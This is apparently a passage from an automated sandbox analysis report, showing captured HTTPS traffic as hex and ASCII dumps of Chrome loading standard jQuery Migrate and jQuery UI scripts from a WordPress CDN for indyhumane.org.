                                                                                                                                                                                                                                                        Data Ascii: =t&&s.data(this,"__className__")||"")}))},"toggleClass-bool");var Q,A,R=!1,C=/^[a-z]/,N=/^(?:Border(?:Top|Right|Bottom|Left)?(?:Width|)|(?:Margin|Padding)?(?:Top|Right|Bottom|Left)?|(?:Min|Max)?(?:Width|Height))$/;s.swap&&s.each(["height","width","reliabl
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 41 29 3a 41 3d 73 2e 63 73 73 4e 75 6d 62 65 72 2c 51 3d 73 2e 66 6e 2e 63 73 73 2c 69 28 73 2e 66 6e 2c 22 63 73 73 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 28 73 2e 65 61 63 68 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 73 2e 66 6e 2e 63 73 73 2e 63 61 6c 6c 28 6f 2c 65 2c 74 29 7d 29 2c 74 68 69 73 29 3a 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 72 3d 78 28 65 29 2c 6e 3d 72 2c 43 2e 74 65 73 74 28 6e 29 26 26 4e 2e 74 65 73 74 28 6e 5b 30 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 6e 2e 73 6c 69 63 65 28 31 29 29 7c 7c 41
                                                                                                                                                                                                                                                        Data Ascii: A):A=s.cssNumber,Q=s.fn.css,i(s.fn,"css",function(e,t){var r,n,o=this;return e&&"object"==typeof e&&!Array.isArray(e)?(s.each(e,function(e,t){s.fn.css.call(o,e,t)}),this):("number"==typeof t&&(r=x(e),n=r,C.test(n)&&N.test(n[0].toUpperCase()+n.slice(1))||A
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 75 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 75 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 2c 50 29 2c 73 2e 6d 69 67 72 61 74 65 49 73 50 61 74 63 68 45 6e 61 62 6c 65 64 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 29 26 26 76 6f 69 64 20 30 3d 3d 3d 53 3f 31 33 3a 53 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 75 28 22 66 78 2d 69 6e 74 65 72 76 61 6c 22 2c 50 29 2c 53 3d 65 7d 7d 29 29 3b 76 61 72 20 4d 3d 73 2e 66 6e 2e 6c 6f 61 64 2c 71 3d 73 2e 65 76 65 6e 74 2e 61 64 64 2c 4f 3d 73 2e 65 76 65 6e 74 2e 66 69 78 3b 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 3d 5b 5d 2c 73 2e 65 76 65 6e 74 2e 66 69 78 48 6f 6f 6b 73 3d 7b 7d 2c 72 28 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2c 22 63 6f 6e 63 61 74 22 2c 73 2e 65 76 65 6e 74 2e 70 72 6f 70 73 2e 63 6f
                                                                                                                                                                                                                                                        Data Ascii: ument.hidden||u("fx-interval",P),s.migrateIsPatchEnabled("fx-interval")&&void 0===S?13:S},set:function(e){u("fx-interval",P),S=e}}));var M=s.fn.load,q=s.event.add,O=s.event.fix;s.event.props=[],s.event.fixHooks={},r(s.event.props,"concat",s.event.props.co
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC1369INData Raw: 7d 29 2c 73 2e 65 61 63 68 28 22 62 6c 75 72 20 66 6f 63 75 73 20 66 6f 63 75 73 69 6e 20 66 6f 63 75 73 6f 75 74 20 72 65 73 69 7a 65 20 73 63 72 6f 6c 6c 20 63 6c 69 63 6b 20 64 62 6c 63 6c 69 63 6b 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 6d 6f 75 73 65 6d 6f 76 65 20 6d 6f 75 73 65 6f 76 65 72 20 6d 6f 75 73 65 6f 75 74 20 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 20 63 68 61 6e 67 65 20 73 65 6c 65 63 74 20 73 75 62 6d 69 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 70 72 65 73 73 20 6b 65 79 75 70 20 63 6f 6e 74 65 78 74 6d 65 6e 75 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 63 28 73 2e 66 6e 2c 72 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 30 3c 61 72 67 75
                                                                                                                                                                                                                                                        Data Ascii: }),s.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,r){c(s.fn,r,function(e,t){return 0<argu
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 78 32 30 5c 74 5c 72 5c 6e 5c 66 5d 2a 29 5b 5e 3e 5d 2a 29 5c 2f 3e 2f 67 69 3b 73 2e 55 4e 53 41 46 45 5f 72 65 73 74 6f 72 65 4c 65 67 61 63 79 48 74 6d 6c 50 72 65 66 69 6c 74 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 6d 69 67 72 61 74 65 45 6e 61 62 6c 65 50 61 74 63 68 65 73 28 22 73 65 6c 66 2d 63 6c 6f 73 65 64 2d 74 61 67 73 22 29 7d 2c 69 28 73 2c 22 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3b 72 65 74 75 72 6e 28 72 3d 28 74 3d 65 29 2e 72 65 70 6c 61 63 65 28 46 2c 22 3c 24 31 3e 3c 2f 24 32 3e 22 29 29 21 3d 3d 74 26 26 54 28 74 29 21 3d 3d 54 28 72 29 26 26 75 28 22 73 65 6c 66 2d 63 6c 6f 73 65 64 2d 74 61 67 73 22 2c 22 48 54 4d 4c 20 74 61 67 73 20 6d 75 73 74 20 62 65 20
                                                                                                                                                                                                                                                        Data Ascii: x20\t\r\n\f]*)[^>]*)\/>/gi;s.UNSAFE_restoreLegacyHtmlPrefilter=function(){s.migrateEnablePatches("self-closed-tags")},i(s,"htmlPrefilter",function(e){var t,r;return(r=(t=e).replace(F,"<$1></$2>"))!==t&&T(t)!==T(r)&&u("self-closed-tags","HTML tags must be


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        10192.168.2.449761192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC574OUTGET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 21464
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/core.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC741INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 33 2e 33 20 2d 20 32 30 32 34 2d 30 34 2d 32 36 0a 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70
                                                                                                                                                                                                                                                        Data Ascii: /*! jQuery UI - v1.13.3 - 2024-04-26* https://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-exp
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6e 74 72 6f 6c 67 72 6f 75 70 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 61 74 65 70 69 63 6b 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 69 61 6c 6f 67 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 72 61 67 67 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 72 6f 70 70 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 6d 6f 75 73 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 70 72 6f 67 72 65 73 73 62 61 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 72 65 73 69 7a 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 61 62 6c 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 65 6c 65 63 74 6d 65 6e 75 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 73 6c 69 64 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f
                                                                                                                                                                                                                                                        Data Ascii: ntrolgroup.js, widgets/datepicker.js, widgets/dialog.js, widgets/draggable.js, widgets/droppable.js, widgets/menu.js, widgets/mouse.js, widgets/progressbar.js, widgets/resizable.js, widgets/selectable.js, widgets/selectmenu.js, widgets/slider.js, widgets/
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6e 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3f 22 73 65 6c 65 63 74 73 74 61 72 74 22 3a 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 6e 28 74 2b 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 7d 29 2c 65 6e 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 66 66 28 22 2e 75 69 2d 64 69 73 61 62 6c 65 53 65 6c 65 63 74 69 6f 6e 22 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 46 6f 63 75 73 61 62 6c 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74
                                                                                                                                                                                                                                                        Data Ascii: n document.createElement("div")?"selectstart":"mousedown",function(){return this.on(t+".ui-disableSelection",function(t){t.preventDefault()})}),enableSelection:function(){return this.off(".ui-disableSelection")}}),/*! * jQuery UI Focusable 1.13.3 * htt
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 69 6f 6e 28 29 7b 76 61 72 20 74 3d 65 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 3b 78 2e 65 61 63 68 28 74 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 7d 29 7d 29 7d 2c 5f 62 69 6e 64 46 6f 72 6d 52 65 73 65 74 48 61 6e 64 6c 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 74 68 69 73 2e 66 6f 72 6d 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 5f 66 6f 72 6d 28 29 2c 74 68 69 73 2e 66 6f 72 6d 2e 6c 65 6e 67 74 68 26 26 28 28 74 3d 74 68 69 73 2e 66 6f 72 6d 2e 64 61 74 61 28 22 75 69 2d 66 6f 72 6d 2d 72 65 73 65 74 2d 69 6e 73 74 61 6e 63 65 73 22 29 7c 7c 5b 5d 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 66 6f 72 6d 2e 6f 6e 28 22 72 65 73 65 74 2e 75 69
                                                                                                                                                                                                                                                        Data Ascii: ion(){var t=e.data("ui-form-reset-instances");x.each(t,function(){this.refresh()})})},_bindFormResetHandler:function(){var t;this.form=this.element._form(),this.form.length&&((t=this.form.data("ui-form-reset-instances")||[]).length||this.form.on("reset.ui
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 3d 3d 31 7d 29 7d 7d 29 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4b 65 79 63 6f 64 65 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 75 69 2e 6b 65 79 43 6f 64 65 3d 7b 42 41 43 4b 53 50 41 43 45 3a 38 2c 43 4f 4d 4d 41 3a 31 38 38 2c 44 45 4c 45 54 45 3a 34 36 2c 44 4f 57 4e 3a 34 30 2c 45 4e 44 3a 33 35 2c 45 4e
                                                                                                                                                                                                                                                        Data Ascii: ==1})}}),/*! * jQuery UI Keycode 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */x.ui.keyCode={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,EN
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 61 70 69 2e 6a 71 75 65 72 79 75 69 2e 63 6f 6d 2f 70 6f 73 69 74 69 6f 6e 2f 0a 20 2a 2f 0a 57 3d 4d 61 74 68 2e 6d 61 78 2c 43 3d 4d 61 74 68 2e 61 62 73 2c 6f 3d 2f 6c 65 66 74 7c 63 65 6e 74 65 72 7c 72 69 67 68 74 2f 2c 73 3d 2f 74 6f 70 7c 63 65 6e 74 65 72 7c 62 6f 74 74 6f 6d 2f 2c 72 3d 2f 5b 5c 2b 5c 2d 5d 5c 64 2b 28 5c 2e 5b 5c 64 5d 2b 29 3f 25 3f 2f 2c 6c 3d 2f 5e 5c 77 2b 2f 2c 61 3d 2f 25 24 2f 2c 68 3d 78 2e 66 6e 2e 70 6f 73 69 74 69 6f 6e 2c 78 2e 70 6f 73 69 74 69 6f 6e 3d 7b 73 63 72 6f 6c 6c 62 61 72 57 69 64 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 2c 69 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e
                                                                                                                                                                                                                                                        Data Ascii: jquery.org/license * * https://api.jqueryui.com/position/ */W=Math.max,C=Math.abs,o=/left|center|right/,s=/top|center|bottom/,r=/[\+\-]\d+(\.[\d]+)?%?/,l=/^\w+/,a=/%$/,h=x.fn.position,x.position={scrollbarWidth:function(){var t,e,i;return void 0!==n?n
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2c 62 3d 28 66 2e 63 6f 6c 6c 69 73 69 6f 6e 7c 7c 22 66 6c 69 70 22 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 5f 3d 7b 7d 2c 65 3d 39 3d 3d 3d 28 65 3d 28 74 3d 76 29 5b 30 5d 29 2e 6e 6f 64 65 54 79 70 65 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 7d 3a 4e 28 65 29 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 28 29 7d 7d 3a 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65
                                                                                                                                                                                                                                                        Data Ascii: ,b=(f.collision||"flip").split(" "),_={},e=9===(e=(t=v)[0]).nodeType?{width:t.width(),height:t.height(),offset:{top:0,left:0}}:N(e)?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:e.preventDefault?{width:0,height:0,offse
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 66 74 3a 65 2c 6d 61 72 67 69 6e 54 6f 70 3a 6e 7d 2c 78 2e 65 61 63 68 28 5b 22 6c 65 66 74 22 2c 22 74 6f 70 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 78 2e 75 69 2e 70 6f 73 69 74 69 6f 6e 5b 62 5b 74 5d 5d 26 26 78 2e 75 69 2e 70 6f 73 69 74 69 6f 6e 5b 62 5b 74 5d 5d 5b 65 5d 28 68 2c 7b 74 61 72 67 65 74 57 69 64 74 68 3a 64 2c 74 61 72 67 65 74 48 65 69 67 68 74 3a 70 2c 65 6c 65 6d 57 69 64 74 68 3a 6c 2c 65 6c 65 6d 48 65 69 67 68 74 3a 61 2c 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 3a 69 2c 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 3a 6f 2c 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 73 2c 6f 66 66 73 65 74 3a 5b 63 5b 30 5d 2b 75 5b 30 5d 2c 63 5b 31 5d 2b 75 5b 31 5d 5d 2c 6d 79 3a 66 2e 6d 79 2c 61 74 3a 66 2e 61 74 2c
                                                                                                                                                                                                                                                        Data Ascii: ft:e,marginTop:n},x.each(["left","top"],function(t,e){x.ui.position[b[t]]&&x.ui.position[b[t]][e](h,{targetWidth:d,targetHeight:p,elemWidth:l,elemHeight:a,collisionPosition:i,collisionWidth:o,collisionHeight:s,offset:[c[0]+u[0],c[1]+u[1]],my:f.my,at:f.at,
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2e 74 6f 70 2b 3d 72 2d 69 29 3a 74 2e 74 6f 70 3d 21 28 30 3c 6c 26 26 72 3c 3d 30 29 26 26 6c 3c 72 3f 6e 2b 6f 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 6e 3a 30 3c 72 3f 74 2e 74 6f 70 2b 3d 72 3a 30 3c 6c 3f 74 2e 74 6f 70 2d 3d 6c 3a 74 2e 74 6f 70 3d 57 28 74 2e 74 6f 70 2d 73 2c 74 2e 74 6f 70 29 7d 7d 2c 66 6c 69 70 3a 7b 6c 65 66 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 65 2e 77 69 74 68 69 6e 2c 6e 3d 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2b 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 6f 3d 69 2e 77 69 64 74 68 2c 69 3d 69 2e 69 73 57 69 6e 64 6f 77 3f 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2c 73 3d 74 2e 6c 65 66 74 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69
                                                                                                                                                                                                                                                        Data Ascii: .top+=r-i):t.top=!(0<l&&r<=0)&&l<r?n+o-e.collisionHeight:n:0<r?t.top+=r:0<l?t.top-=l:t.top=W(t.top-s,t.top)}},flip:{left:function(t,e){var i=e.within,n=i.offset.left+i.scrollLeft,o=i.width,i=i.isWindow?i.scrollLeft:i.offset.left,s=t.left-e.collisionPositi
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 74 29 7b 69 3d 65 2e 62 6f 64 79 7d 72 65 74 75 72 6e 20 69 3d 28 69 3d 69 7c 7c 65 2e 62 6f 64 79 29 2e 6e 6f 64 65 4e 61 6d 65 3f 69 3a 65 2e 62 6f 64 79 7d 2c 78 2e 75 69 2e 73 61 66 65 42 6c 75 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 22 62 6f 64 79 22 21 3d 3d 74 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 78 28 74 29 2e 74 72 69 67 67 65 72 28 22 62 6c 75 72 22 29 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 53 63 72 6f 6c 6c 20 50 61 72 65 6e 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20
                                                                                                                                                                                                                                                        Data Ascii: Element}catch(t){i=e.body}return i=(i=i||e.body).nodeName?i:e.body},x.ui.safeBlur=function(t){t&&"body"!==t.nodeName.toLowerCase()&&x(t).trigger("blur")},/*! * jQuery UI Scroll Parent 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        11192.168.2.449760192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:09 UTC574OUTGET /wp-includes/js/jquery/ui/menu.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 10199
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/menu.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC741INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4d 65 6e 75 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75
                                                                                                                                                                                                                                                        Data Ascii: /*! * jQuery UI Menu 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?define(["jqu
